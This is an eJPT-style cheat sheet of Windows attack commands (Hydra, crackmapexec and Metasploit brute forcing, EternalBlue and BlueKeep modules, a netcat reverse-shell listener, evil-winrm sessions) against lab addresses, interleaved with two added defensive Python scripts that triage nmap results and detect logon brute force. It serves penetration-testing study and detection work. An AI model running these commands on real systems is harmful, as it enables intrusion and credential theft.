Exploiting Microsoft IIS WebDAV
Quick Scan to Check Open Ports and Services:
nmap -sV -sC 10.10.10.10
//Quick scan to identify open ports and services on the target.
Brute Forcing WebDAV:
nmap -sV -p 80 --script=http-enum 10.10.10.10
//Enumerate common web paths; http-enum reveals the /webdav/ directory.
hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_password.txt 10.10.10.10 http-get /webdav/
//Hydra used to perform a dictionary attack against the authentication on the /webdav/ directory.
Exploiting SMB with PsExec
SMB Login Brute Force:
msfconsole
msf6 > use auxiliary/scanner/smb/smb_login
//Brute forcing SMB login credentials with Metasploit.
Automated SMB Login with Metasploit:
msfconsole
msf6 > use exploit/windows/smb/psexec
//Once valid credentials are known, the psexec module uses them to run a payload over SMB.
Exploiting Windows MS17-010 SMB (EternalBlue)
Checking for MS17-010 Vulnerability:
nmap -sV -p 445 -O 10.10.10.10
nmap -sV -p 445 10.10.10.10 --script=smb-vuln-ms17-010
//Quick scan and Nmap script to identify the MS17-010 vulnerability.
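The scans above (and the RDP and WinRM port checks later in this sheet) are far more useful to a defender when their results are triaged automatically rather than read by eye. The following Python script is an added example, not part of the original post: it parses nmap's XML output (produced by adding `-oX scan.xml` to the commands above), flags the ports this sheet attacks together with the control to verify, and raises a critical finding wherever the smb-vuln-ms17-010 script reports a VULNERABLE state. The XML embedded in the script is constructed to mirror nmap's output layout; the second host assumes the script ran with `vulns.showall` so that a NOT VULNERABLE state is present.

```python
"""Triage nmap XML output for the exposures probed in this cheat sheet.

Added example, not part of the original post. Run the scans with -oX (for
example: nmap -sV -p 445 --script=smb-vuln-ms17-010 -oX scan.xml 10.10.10.10)
and pass the file to triage_nmap_xml(). The XML below is constructed to mimic
nmap's output structure; the smb-vuln-ms17-010 result follows the NSE layout
(a <table> keyed by CVE with a 'state' element).
"""
import sys
import xml.etree.ElementTree as ET

# Constructed sample output: one unpatched host and one patched host.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 10.10.10.0/24">
  <host>
    <address addr="10.10.10.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Microsoft IIS httpd" version="7.5"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="microsoft-ds"/>
        <script id="smb-vuln-ms17-010" output="VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)">
          <table key="CVE-2017-0143">
            <elem key="state">VULNERABLE</elem>
          </table>
        </script>
      </port>
      <port protocol="tcp" portid="3389">
        <state state="open"/>
        <service name="ms-wbt-server"/>
      </port>
      <port protocol="tcp" portid="5985">
        <state state="open"/>
        <service name="http" product="Microsoft HTTPAPI httpd" version="2.0"/>
      </port>
    </ports>
  </host>
  <host>
    <address addr="10.10.10.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="microsoft-ds"/>
        <script id="smb-vuln-ms17-010" output="">
          <table key="CVE-2017-0143">
            <elem key="state">NOT VULNERABLE</elem>
          </table>
        </script>
      </port>
      <port protocol="tcp" portid="3389">
        <state state="closed"/>
        <service name="ms-wbt-server"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Ports this cheat sheet attacks, with the control a defender should verify.
EXPOSURE_NOTES = {
    80: "HTTP: check whether WebDAV is enabled and whether it requires strong authentication",
    445: "SMB: confirm SMBv1 is disabled and MS17-010 is patched; block 445 at the perimeter",
    3389: "RDP: enforce NLA, restrict source networks, alert on bursts of event 4625",
    5985: "WinRM: restrict to management networks and require Kerberos or HTTPS (5986)",
}


def triage_nmap_xml(xml_text):
    """Return a list of findings (host, port, severity, note) from nmap XML."""
    findings = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "unknown"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed or filtered ports are not exposures
            portid = int(port.get("portid"))
            if portid in EXPOSURE_NOTES:
                findings.append({"host": addr, "port": portid,
                                 "severity": "info", "note": EXPOSURE_NOTES[portid]})
            # NSE vulnerability scripts report one table per CVE with a 'state' element.
            for script in port.iter("script"):
                if script.get("id") != "smb-vuln-ms17-010":
                    continue
                for table in script.iter("table"):
                    state_el = table.find("elem[@key='state']")
                    if state_el is not None and (state_el.text or "").strip() == "VULNERABLE":
                        findings.append({"host": addr, "port": portid, "severity": "critical",
                                         "note": f"{table.get('key')} (MS17-010) reported VULNERABLE: isolate and patch"})
    return findings


def critical_hosts(findings):
    """Hosts with at least one critical finding, for prioritising remediation."""
    return sorted({f["host"] for f in findings if f["severity"] == "critical"})


if __name__ == "__main__":
    xml_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NMAP_XML
    for f in triage_nmap_xml(xml_text):
        print(f"{f['severity']:8} {f['host']}:{f['port']}  {f['note']}")
```

Run it as `python triage.py scan.xml`; with no argument it uses the embedded sample and reports five exposures plus one critical MS17-010 finding on 10.10.10.10, while the patched host only shows SMB as exposed. The same loop can be extended with other NSE vulnerability scripts, since they all use the table-with-state layout.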
Manual Exploitation with EternalBlue:
nc -nlvp 4444
//Listener for the reverse shell that the payload will call back to.
python eternalblue_exploit8.py 10.10.10.10 <shellcode_file>
//Manual exploitation with the EternalBlue script; the second argument is the shellcode/payload file, not the script name repeated.
Automated Exploitation with Metasploit:
msfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue
//Automating the exploitation of the MS17-010 vulnerability with Metasploit.
Exploiting RDP
Checking for RDP:
nmap -sV -O 10.10.10.10
//Quick scan to identify if RDP is enabled on the target machine.
Brute Forcing RDP Credentials:
hydra -l Administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
//Brute forcing RDP credentials with Hydra.
Connecting to RDP:
xfreerdp /u:Administrator /p:helloworld /v:10.10.10.10
//Connecting to RDP with xfreerdp after obtaining credentials.
Exploiting Windows CVE-2019-0708 RDP (BlueKeep)
Checking for BlueKeep Vulnerability:
nmap -p 3389 10.10.10.10
//Quick scan to confirm RDP (3389) is open; the Metasploit scanner below checks for the BlueKeep vulnerability itself.
Checking for BlueKeep with Metasploit:
msfconsole
msf6 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
//Scanner module that reports whether the target is vulnerable to BlueKeep.
Exploiting WinRM
Checking for WinRM:
nmap -sV -p 5985 10.10.10.10
//Quick scan to identify whether WinRM is listening on the target.
Brute Forcing WinRM Credentials:
crackmapexec winrm 10.10.10.10 -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
//Brute forcing WinRM credentials with crackmapexec.
Executing Commands with the -x Option:
crackmapexec winrm 10.10.10.10 -u administrator -p tinkerbell -x "whoami"
//Running a command over WinRM once credentials are known.
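Every credential attack in this sheet (Hydra against RDP or the IIS /webdav/ directory, the Metasploit smb_login scanner, crackmapexec against WinRM) lands on the target as a run of Windows Security event 4625 from one source address, followed by a 4624 if a guess succeeds. The script below is an added example, not part of the original post: it groups failed logons by source IP, finds the densest window of failures, classifies the burst as brute force (few accounts) or password spray (many accounts), and reports any success from the same source after the burst. The events are constructed in the flat JSON shape a log shipper produces; the logon-type descriptions are the usual mapping and are an assumption about how each tool authenticates.

```python
"""Detect logon brute force and password spraying from Windows Security events.

Added example, not part of the original post. The events below are constructed
to look like 4625 (failed logon) and 4624 (successful logon) records after a
log shipper has flattened them to JSON.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Typical logon types for the tools in this cheat sheet (assumption, not from the post).
LOGON_TYPE_HINTS = {
    3: "network (SMB, WinRM, RDP with NLA)",
    8: "network cleartext (IIS Basic auth, e.g. WebDAV)",
    10: "remote interactive (RDP)",
}


def _fail(ts, user, ip, logon_type):
    # 0xC000006D is the status for "unknown user name or bad password".
    return {"EventID": 4625, "TimeCreated": ts, "TargetUserName": user,
            "IpAddress": ip, "LogonType": logon_type, "Status": "0xC000006D"}


def _ok(ts, user, ip, logon_type):
    return {"EventID": 4624, "TimeCreated": ts, "TargetUserName": user,
            "IpAddress": ip, "LogonType": logon_type}


# Constructed sample events.
SAMPLE_EVENTS = (
    # One account, many guesses, then a success: a dictionary attack that worked.
    [_fail(f"2024-01-15T10:00:{i:02d}", "Administrator", "10.10.14.5", 3) for i in range(8)]
    + [_ok("2024-01-15T10:00:09", "Administrator", "10.10.14.5", 3)]
    # One guess per account from a single source: a password spray.
    + [_fail(f"2024-01-15T10:05:{i:02d}", u, "10.10.14.7", 8)
       for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])]
    # A single mistyped password from a workstation, then success: benign.
    + [_fail("2024-01-15T10:10:00", "alice", "10.10.20.3", 10),
       _ok("2024-01-15T10:10:05", "alice", "10.10.20.3", 10)]
)


def detect_logon_attacks(events, fail_threshold=5, spray_accounts=5, window=timedelta(minutes=5)):
    """Group 4625 events by source IP and find the densest window of failures.

    A burst touching at least spray_accounts distinct users is a password spray,
    otherwise brute force. A 4624 from the same source at or after the burst's
    last failure is reported as success_after: the signal that a guess worked.
    """
    failures = defaultdict(list)
    successes = defaultdict(list)
    for ev in events:
        ts = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == 4625:
            failures[ev["IpAddress"]].append((ts, ev["TargetUserName"], ev["LogonType"]))
        elif ev["EventID"] == 4624:
            successes[ev["IpAddress"]].append((ts, ev["TargetUserName"]))

    alerts = []
    for ip, fails in failures.items():
        fails.sort()
        best_count, best_range, start = 0, (0, 0), 0
        for end in range(len(fails)):  # sliding window over sorted timestamps
            while fails[end][0] - fails[start][0] > window:
                start += 1
            if end - start + 1 > best_count:
                best_count, best_range = end - start + 1, (start, end)
        if best_count < fail_threshold:
            continue  # a few typos from one host are not an attack
        burst = fails[best_range[0]:best_range[1] + 1]
        accounts = sorted({user for _, user, _ in burst})
        last_failure = burst[-1][0]
        alerts.append({
            "source_ip": ip,
            "kind": "password_spray" if len(accounts) >= spray_accounts else "brute_force",
            "failures": best_count,
            "accounts": accounts,
            "logon_types": sorted({LOGON_TYPE_HINTS.get(lt, str(lt)) for _, _, lt in burst}),
            "success_after": sorted({user for ts, user in successes.get(ip, []) if ts >= last_failure}),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_logon_attacks(SAMPLE_EVENTS):
        print(alert)
```

On the sample data this yields two alerts: a brute force from 10.10.14.5 whose `success_after` names Administrator (the case that needs immediate response), and a password spray from 10.10.14.7 with no success; the workstation typo produces nothing. Tune `fail_threshold` and `window` to the environment, and treat the wordlist sizes in the commands above as a hint of how many failures a real run generates in seconds.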
Starting a Session with evil-winrm.rb:
evil-winrm.rb -u administrator -p 'tinkerbell' -i 10.4.24.138
Creating a Meterpreter Session with Metasploit:
msfconsole
msf6 > use exploit/windows/winrm/winrm_script_exec
After establishing a session, you can gather system information using:
meterpreter > sysinfo
Conclusion
In this comprehensive exploration of system and host-based attacks, Amr Elsagaei shares invaluable insights and notes on exploiting diverse Windows vulnerabilities. Covering everything from web services to SMB and RDP, these techniques shed light on the myriad avenues attackers may explore. It's crucial to approach ethical hacking with a sense of responsibility and adhere to high ethical standards to ensure the integrity of security testing.
Best of luck on your eJPT adventure!